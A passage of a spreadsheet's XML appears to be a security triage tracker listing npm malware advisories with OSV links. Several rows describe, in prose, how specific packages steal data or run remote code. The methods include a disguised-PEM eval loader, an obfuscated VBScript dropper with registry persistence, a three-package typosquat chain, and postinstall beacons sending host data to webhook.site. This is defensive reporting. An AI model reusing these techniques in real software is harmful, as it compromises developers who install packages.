      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr"/>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>GHSA-p8f8-xjrg-2v4g</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:vinnleys</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (da2c109f5566555ce8963688bfbb309220aa3fca570bcee74d32b1a8fcc83c75)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (9b08fe0df49484a21e53ee26da4ba43b548f0424d59c77a7258f64fa972a574d)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56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16092</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>GHSA-q246-72rh-fp8w</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:@haimiya/baileys</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (afb1fac619ba416b14b747307762d4e4cf1cfc41f00a244c8e472af5f689deb0)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (fd6c3f53f36ea4839df1170d4f08455005be34649d64b567f621b47b13b0760e)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57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16066</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>GHSA-qmw2-mp2f-cgg3</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/portal</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c9a0273cadda58738fa01d0c67fb17edd588f5870a13128a4aa47820f6a13fab)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58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16107</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>GHSA-v5v6-h869-g34f</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>npm:crypto-validates</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">crypto-validates@0.0.2 ships a dist/index.js identical to polygon-toolkits-validator@1.1.4: validate(input) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check through check_validator(), and randomBytes(size) forwards freshly generated crypto.randomBytes output to the same host before returning it. Nothing runs on install or import; the send happens on the first call. The README claims the package contains only type definitions. Same publisher (luisdary) as raydium-clmm-sdk and pumpswap-sdk-v1.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (11ed61288a3d0f6dece3dd31a0a5e820fe80b970dfc25f83fc2f0a0653018d6e)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59" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16085</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>GHSA-vfrg-29g4-854p</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>npm:xbailsync</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (18ff4aa1a565659c7106700fc5b7c355770ec8fc6bd62c0d9a4f8efce56bf09f)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (37b2c945ecd2da7d2c6d4987cf7101250483335439ac0d5f2ac94937643cd61a)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60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16093</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>GHSA-w6hj-c25h-wgh7</t>
        </is>
      </c>
      <c r="D61" s="5" t="inlineStr"/>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="inlineStr"/>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/base</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (4430765bbffe0f1b4471a3d1dbafdbc97059e7717fc6a1967fd5ebf05b83a0ef)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61" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16106</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>GHSA-xm59-fwxf-vq6g</t>
        </is>
      </c>
      <c r="D62" s="5" t="inlineStr"/>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="inlineStr"/>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>npm:graphql-js-client-transform</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (8c11b1672f9929aa10893cab85bc0f4e9a5ae5adfc2c8ae637d45e61b644692b)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62" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16086</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>GHSA-xqx8-w483-rq8x</t>
        </is>
      </c>
      <c r="D63" s="5" t="inlineStr"/>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="inlineStr"/>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>npm:sams-text-style</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (f81a7140e2d1a61a8bb4c6594ad8b75cadab20788d22005d9bf026d834c2e626)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63" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16091</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16053</t>
        </is>
      </c>
      <c r="D64" s="5" t="inlineStr"/>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="inlineStr"/>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>npm:file-type-detector</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (04917bd7fc156dcb9793cb1f1d06ed0f2d0cb1b3aa4b04431dea54ed71f6be72)
A clone of file-type-checker with one function added: isSign(name, moduleName, offset) in dist/validation/image.js reads public/${name}.png from the working directory, splits the buffer at -offset, and writes the trailing payload to../../../{moduleName}/log - a sibling package under node_modules - then returns isPNG() so the caller sees a plausible boolean. It is undocumented, reachable only via an __exportStar wildcard so it is never named in dist/index.js, and fails silently on try/catch.
Drop stage of a three-package chain: file-type-detector writes the payload, gloggo (1.1.2-1.1.4) executes it via require('./log'), and sonmors (typosquat of sonner) triggers the chain by requiring gloggo. gloggo shares the npm publisher log-developer and was published five minutes apart on 2026-08-27. No install hooks; execution occurs on require().
</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16053</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16054</t>
        </is>
      </c>
      <c r="D65" s="5" t="inlineStr"/>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="inlineStr"/>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>npm:gloggo</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a333f8ded17af0754357d938933ee95e9ab1f857cc875948d49cb9b26992e75d)
gloggo impersonates the legitimate gulpjs 'glogg' logging library by copying its README, shields, and LICENSE text (attributed to Blaine Bublitz), while package.json attributes authorship to 'Blockvora Team &lt;team@blockvora.com&gt;' with repository 'blockvora/gloggo'. The package name is a one-character variant of 'glogg'. getLogger() invokes isSign('favorite','gloggo',12467) from the dependency 'file-type-detector' and, when that gate returns truthy, executes require('./log'). The './log' module is not present in the tarball, so its bytes must be produced or supplied at require time by the dependency. A logging utility has no legitimate reason to gate its loader on an opaque file-signature check from an unrelated third-party dependency, and the gated path executes code that is not part of the shipped package contents. Consumers who install gloggo believing it to be glogg import a typosquat that conditionally runs code sourced from a suspicious sibling dependency when the module is required.
</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16054</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16055</t>
        </is>
      </c>
      <c r="D66" s="5" t="inlineStr"/>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="inlineStr"/>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>npm:sonmors</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66e21634e32b7d24357ad667703da4ddeb42542ed9fc6a3ed28c7257d2e27fca)
Package `sonmors` ships a near-copy of the `sonner` React toast library and spoofs sonner's identity in package.json (author `Emil Kowalski &lt;e@emilkowal.ski&gt;`, homepage `sonner.emilkowal.ski`, repository `github.com/emilkowalski/sonner`) while being published under a different name. The only functional divergence from sonner in the shipped `dist/index.js` is a top-level `const getLogger = require('gloggo'); var logger = getLogger('Log');` and a `logger.infO('useSonner')` call inside the exported hook. `require('gloggo')` executes on every `require('sonmors')`, so any consumer who mistypes `sonner` as `sonmors` pulls in and runs whatever the companion `gloggo` package contains at library-load time. The payload lives in the transitive dependency rather than in this tarball; the lure is the impersonated identity and the near-perfect sonner clone.
</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16055</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16059</t>
        </is>
      </c>
      <c r="D67" s="5" t="inlineStr"/>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="inlineStr"/>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>npm:rojo-rbx</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8bf25c0dd3a1b933c3ee2fe887301590c3b92e383a1e6c380fcdb9544578720b)
The package impersonates the legitimate Rojo Roblox tooling project. Its npm install lifecycle runs scripts/install.js, which on Windows downloads a VBScript from the hardcoded URL https://l81.me/updater.vbs, writes it to %APPDATA%\Rojo\rojo-sync.vbs, and executes it hidden via wscript.exe //B. The script then adds an HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry named RojoClientSync that re-launches the dropped VBS on every user login, giving the fetched payload boot persistence independent of the package. The remote URL, wscript.exe, //B flag, target directory, file name, registry path, and value name are all reconstructed at runtime from String.fromCharCode numeric arrays via a _d() helper to evade static review. The shipped bin only prints --version/--help and provides no functional Rojo CLI; the manifest points at github.com/Unreal-Works/rojo-npm rather than the real rojo-rbx/rojo project. The dropper is the package's only real behavior.
</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16059</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16060</t>
        </is>
      </c>
      <c r="D68" s="5" t="inlineStr"/>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="inlineStr"/>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>npm:selfcerts</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ef5688e6ff2ef3728556e4e455154ad9a8f6c44670eee611d55adb3cba250536)
index.js reads sample/cert.pem, strips the BEGIN/END CERTIFICATE header and footer, base64-decodes the body, and eval()s the result. The decoded bytes are a JavaScript IIFE that base64-decodes a hardcoded URL (http://144.172.104.211/settings/privacy.php), fetches its response over plain HTTP, and pipes the body into a detached python3 process via stdin, executing whatever the remote host returns. The loader (loadSampleCertificate) is invoked unconditionally at the top of the exported generateCertificates() API, so any consumer that uses the package as advertised triggers remote code execution on the installer's host. Presenting an executable payload as a PEM certificate and nesting the C2 URL under a second base64 layer is deliberate obfuscation with no legitimate role in a certificate-generation library.
</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16060</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16061</t>
        </is>
      </c>
      <c r="D69" s="5" t="inlineStr"/>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="inlineStr"/>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>npm:@yongot/canary-mcp-isolation</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1fed7c0ff512ccb2e87647a41a92653138ff50b2be906043aba86ce76b49e340)
The package's postinstall script (beacon.js), also re-executed on require via index.js, sends the installer's hostname, run identifiers, and the output of the `id` shell command to a hardcoded third-party collector at https://webhook.site/b76376f8-118e-44f1-a5ee-8a73f55b137b over HTTPS. The same script probes the GCP instance metadata service at 169.254.169.254 and metadata.google.internal with the `Metadata-Flavor: Google` header and reports the status and body back to the webhook, disclosing whether the install environment is a cloud VM and what IMDS returns. Data leaves the installer's host to an attacker-controlled collector automatically on `npm install` and on `require()`, without consent.
</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16061</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16062</t>
        </is>
      </c>
      <c r="D70" s="5" t="inlineStr"/>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>npm:@yongot/canary-mcp-test</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b93b70d19f6065f9757e39a5d7f799ca9cfff26e2c47b6e4c51012a104885578)
Package @yongot/canary-mcp-test@2.0.0 ships beacon.js which runs `execSync('id')`, reads `os.hostname()`, and issues an HTTPS GET to a hardcoded webhook.site collector (https://webhook.site/b76376f8-118e-44f1-a5ee-8a73f55b137b) with stage, host, and id_output query parameters. The package.json postinstall hook invokes `node beacon.js postinstall`, so the beacon fires automatically on `npm install`. index.js (the package main) also requires beacon.js twice at load time, so any consumer that imports the package re-triggers the same exfiltration of the installer's Unix uid/gid/groups and hostname to the third-party webhook collector.
</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16062</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16063</t>
        </is>
      </c>
      <c r="D71" s="5" t="inlineStr"/>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>npm:alloy-graphql</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
